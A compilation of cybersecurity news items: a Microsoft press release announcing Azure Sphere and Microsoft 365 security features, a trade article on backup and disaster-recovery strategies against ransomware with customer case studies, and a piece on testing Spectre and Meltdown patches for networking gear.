“As last year’s devastating cyberattacks demonstrated, security threats are evolving and becoming even more serious,” said Brad Smith, president of Microsoft. “The tech sector’s innovations need to accelerate to outpace security threats. Today’s steps bring important security advances not just to the cloud, but to the billions of new devices that are working on the edge of the world’s computer networks.”

Securing a new generation of connected devices: announcing Azure Sphere

Microsoft is harnessing the power of the intelligent cloud to address emerging threats against a new class of connected devices, those relying on a chip the size of a thumbnail called a microcontroller unit (MCU). MCU-powered devices are already the most populous area of computing, with roughly 9 billion new devices every year. They are found in everything from toys and household appliances to industrial equipment, and attackers are starting to target them. To bring security to this next generation of connected devices, Microsoft is introducing Azure Sphere, which it describes as the industry’s first holistic platform for creating highly secured, connected MCU devices on the intelligent edge. Azure Sphere combines an entirely new class of MCUs with more than five times the power of legacy MCUs, an OS custom built for IoT security, and a turnkey cloud security service that guards every Azure Sphere device. With Azure Sphere, Microsoft extends the boundaries of the intelligent edge to power and secure an entirely new category of devices.

“As our homes become more connected, we place significant value on the security of connected devices, so we can focus on continuing to deliver an exceptional customer experience,” said Brian Jones, director of Product Strategy and Marketing at Sub-Zero Group Inc. “Microsoft’s approach with Azure Sphere is unique in that it addresses security holistically at every layer.”

Microsoft 365 Intelligent Security Solutions: Simplifying Security

As security threats become more complex, companies are increasingly finding that the intelligence and threat protection tools they need to remain a step ahead of attackers are in the cloud. Today, Microsoft introduced several new intelligent security features for its Microsoft 365 commercial cloud offering designed to help IT and security professionals simplify how they manage security across their enterprises:

Advanced tools that make it easier to prevent threats before they happen

  • To help teams stay prepared and ahead of threats, Microsoft today released Microsoft Secure Score and Attack Simulator. Secure Score makes it easier for organizations to determine which controls to enable to help protect users, data and devices by quickly assessing readiness and providing an overall security benchmark score. It will also let organizations compare their results to those with similar profiles using built-in machine learning. Attack Simulator, a part of Office 365 Threat Intelligence, lets security teams run simulated attacks — including mock ransomware and phishing campaigns — to event-test their employees’ responses and tune configurations accordingly.

Automated threat detection and remediation to free up security operations teams

  • With the latest Windows 10 update, now in preview, Windows Defender Advanced Threat Protection (ATP) works across other parts of Microsoft 365 to include threat protection and remediation spanning Office 365, Windows and Azure. Also available today in preview, and with the upcoming Windows 10 update, are new automated investigation and remediation capabilities in Windows Defender ATP, leveraging artificial intelligence and machine learning to quickly detect and respond to threats on endpoints, within seconds, at scale.
  • Conditional Access provides real-time risk assessments to help ensure that access to sensitive data is appropriately controlled, without getting in the way of users’ productivity. Microsoft 365 is now adding the device risk level set by Windows Defender ATP to Conditional Access in preview to help ensure that compromised devices can’t access sensitive business data.

Stronger partnerships to give customers more integrated solutions

  • The intelligence data used to quickly detect and respond to threats improves as more relevant signals are added. Machine learning tools are only as good as the data they receive. Microsoft’s security products are informed by the trillions of diverse signals feeding into the Microsoft Intelligent Security Graph. Today, Microsoft announced a preview of a new security API for connecting Microsoft Intelligent Security Graph-enabled products as well as intelligence from solutions built by customers and technology partners to greatly enhance the fidelity of intelligence.

Most security tools report an attack from a single limited perspective, offering insight into one piece of a potentially larger threat. By connecting individual tools to the Intelligent Security Graph, security teams get new perspectives and more meaningful patterns of data to speed up threat investigation and remediation. The new API is in early testing with a select group of cybersecurity industry leaders that are collaborating with Microsoft to shape its development. The group, which includes Anomali, Palo Alto Networks and PwC, joined Microsoft today to share their own early exploration of the API and how it may improve each company’s ability to protect their mutual customers.

  • Microsoft also is announcing a new Microsoft Intelligent Security Association for security technology partners so they can benefit from, and contribute to, the Intelligent Security Graph and Microsoft security products. Members of the association will be able to create more integrated solutions for customers that provide greater protection and detect attacks more quickly. Palo Alto Networks and Anomali join PwC and other existing partners as founding members of the new association.

Microsoft is partnering with customers through their digital transformation by making it easier for them to help keep assets secure from the cloud to the edge.

More information on Microsoft’s security announcements can be found at the Microsoft Security News site.

Microsoft (Nasdaq “MSFT” @microsoft) enables digital transformation for the era of an intelligent cloud and an intelligent edge. Its mission is to empower every person and every organization on the planet to achieve more.


The post Microsoft announces new intelligent security innovations to help businesses manage threats from cloud to edge appeared first on Stories.

Ransomware outbreak threat calls for backup and DR strategy

The ransomware outbreak threat may be subsiding somewhat, but IT managers continue to shore up their defenses. Backup and disaster recovery is a key area of emphasis.

For much of 2017, the WannaCry and NotPetya ransomware outbreaks dominated cybercrime headlines. A new report from antimalware vendor Malwarebytes said ransomware detections last year increased 90% among businesses. But by the end of 2017, the “development of new ransomware families grew stale,” as cybercriminals shifted their focus to other forms of malware, such as banker Trojans that steal financial information, according to the report, “Cybercrime Tactics and Techniques: 2017 State of Malware.”

That said, organizations are looking to bolster their ransomware outbreak protections. Front-end measures often include antivirus software, firewalls and content scanners that can intercept email attachments that appear questionable.

IT departments, however, are also looking to strengthen back-end protections that can help them recover from ransomware attacks that lock up data via encryption. Here, the emphasis is on disaster recovery strategies that let a business restore its data from a backup copy. But even here there are risks: IT managers must ensure the backups they make are actually usable and consider how long a data restore will take in the event of an emergency.

Another level of security

The city of Milpitas, Calif., already has a number of security measures in place to defend itself from a ransomware outbreak. On the front end, the municipal government employs email filtering, spam filtering and email attachment scanning. On the back end, the city uses BackupAssist, a Windows server backup and recovery software offering for SMBs. A remote disaster recovery site provides an additional line of defense.

The city earlier this month said it layered on another element to its backup and recovery defense. Mike Luu, information services director for the city of Milpitas, said the city activated CryptoSafeGuard, a BackupAssist feature the vendor recently added to its product.

CryptoSafeGuard, according to the company, prevents infected files from being backed up and also prevents backups from becoming encrypted. Some ransomware attacks have succeeded in encrypting both an organization’s production and backup data.

“It’s just another method of trying to protect against [ransomware],” Luu said of CryptoSafeGuard.

Luu said switching on CryptoSafeGuard was a simple matter of ticking a box on BackupAssist’s user interface. “It came along for the ride at no additional cost,” he added.

BackupAssist offers CryptoSafeGuard as part of the vendor’s BackupCare subscription package. Troy Vertigan, digital sales and marketing manager at BackupAssist, said 30% of the vendor’s customers running the latest versions of BackupAssist have activated CryptoSafeGuard since it became available in September 2017.

When backups fail

Backup plans can fall through when ransomware hits. TenCate, a maker of composite materials and armor based in the Netherlands, found that out a few years ago during the CryptoLocker ransomware outbreak. Malware entered the company’s U.S. operations through a manufacturing facility and made its way to the file server, recalled Jayme Williams, senior systems engineer at TenCate. Data ended up encrypted from the shop floor to the front office.

When TenCate attempted a data restore from Linear Tape-Open standard tape backups, the backup software the company used wasn’t able to catalog the LTO tapes — a necessary step for recovering files. Williams said some data had been copied off to disk media, but that backup tier was also unreadable. He contacted a data recovery service, which was able to extract the data from the disks.

The company’s disk-based backups weren’t frequent, so some of the data had become stale. The recovered data, however, provided a framework for rebuilding what was lost. It took two weeks to make data accessible again; even then, it wasn’t an ideal data restore because of the age of the recovered data.

One of the key lessons learned from the CryptoLocker experience was that TenCate’s security must have been lacking for the ransomware infection to penetrate as far as it did, Williams noted. In response, company managers have signed off on tighter security.

The other lesson: Backup and disaster recovery are different things.

“Backup is not resilience,” Williams said.

That realization put TenCate on the path toward new approaches. Initially, the company, which is a VMware shop, considered the virtualization vendor’s Site Recovery Manager. But the company’s IT services partner recommended a cloud-based backup and disaster recovery offering from Zerto. The vendor replicates data from an organization’s on-site data stores to the cloud.

One factor in favor of Zerto was simplicity. Zerto helped TenCate set up a proof of concept (POC) in about 30 minutes to demonstrate replication and failover. When Williams received permission to purchase the replication service, TenCate was able to take the POC into production without reinstallation.

When a second ransomware outbreak struck TenCate, the updated security and disaster recovery system thwarted the attack. The company’s virtual machines (VMs) were shielded within Zerto’s Virtual Protection Groups and journaling technique, which Williams described as “the TiVo of the VM.” The Zerto journal lets administrators roll back a VM to a point in time before the ransomware hit — a matter of seconds, according to Williams.

Time is a critical consideration in devising a ransomware mitigation strategy, noted Michael Suby, Stratecast vice president of research at Frost & Sullivan.

An overly lengthy data restore process leaves organizations vulnerable to ransomware demands, he said. A besieged organization may capitulate and pay the fee if a drawn-out recovery time would result in a greater loss of revenue or threaten lives, as in the case of an attack against a hospital.

“Companies can still be exploited if the time to revert to those backup files is excessive,” Suby explained. “It’s not just having backup files. We have to have them readily accessible.”

No need to rush network patching for Spectre and Meltdown

The recently discovered security threat in CPUs from nearly a dozen manufacturers poses a low risk to corporate networking gear, so operators have time to test vendors’ patches thoroughly.

That’s the take of security experts contacted by SearchNetworking following the discovery last week of the Spectre and Meltdown vulnerabilities that affect Intel, AMD and ARM chips. In response, Cisco and Juniper Networks have released patches rated medium and low risk, respectively, for a variety of products.

The low risk of Spectre and Meltdown to switches and routers means network managers have the time to thoroughly test the patches to minimize their impact on hardware performance, experts said.

“If you’re getting a firmware update, you need to patch,” said Rob Westervelt, analyst at IDC. “[But] the issue is whether you just deploy the patch or test it thoroughly and make sure you don’t break any applications or anything else.”

Roughly 20 CSOs and IT security professionals interviewed by IDC were taking a methodical approach to applying Spectre and Meltdown fixes across all systems.

“While it is top of mind, it’s not something that they’re immediately jumping on to patch,” Westervelt said. “They are using established best practices and testing those patches first.”

Network performance at risk

Westervelt warned there is the possibility network performance will suffer. “In some cases, it could be very costly.”

Indeed, Microsoft reported in a blog post that the performance impact of patches for the PC and server versions of Windows would range from minor to significant, depending on the age of the operating system and the CPU. “I think we can expect a similar variety of performance impacts across other [vendors’] products,” said Jake Miller, a senior security analyst at IT consulting firm Bishop Fox, based in Tempe, Ariz.

Security pros expect hackers sophisticated enough to exploit the hard-to-reach vulnerabilities to target mostly servers in large data centers that host cloud computing environments. Because of the level of expertise needed to take advantage of the flaws, hackers working for nation states are the most likely attackers, experts said.

Exploiting the CPU holes would involve crafting code that takes advantage of how some processors anticipate the operations a program will request next. In preparation for those requests, processors load valuable data and instructions into memory, which attackers can then steal.

“The threat is significant, but currently is limited to highly sophisticated attackers and hacking groups with the means to carry out multi-staged targeted attacks,” IDC said in a research note. “Financially motivated cybercriminals are more likely to continue to use more accessible, time-tested methods to retrieve passwords and sensitive data.”

Nevertheless, even a low risk to networking gear is worth the time needed for fixing. “It’s better to be safe than sorry,” said Jonathan Valamehr, COO and co-founder of cybersecurity company Tortuga Logic Inc.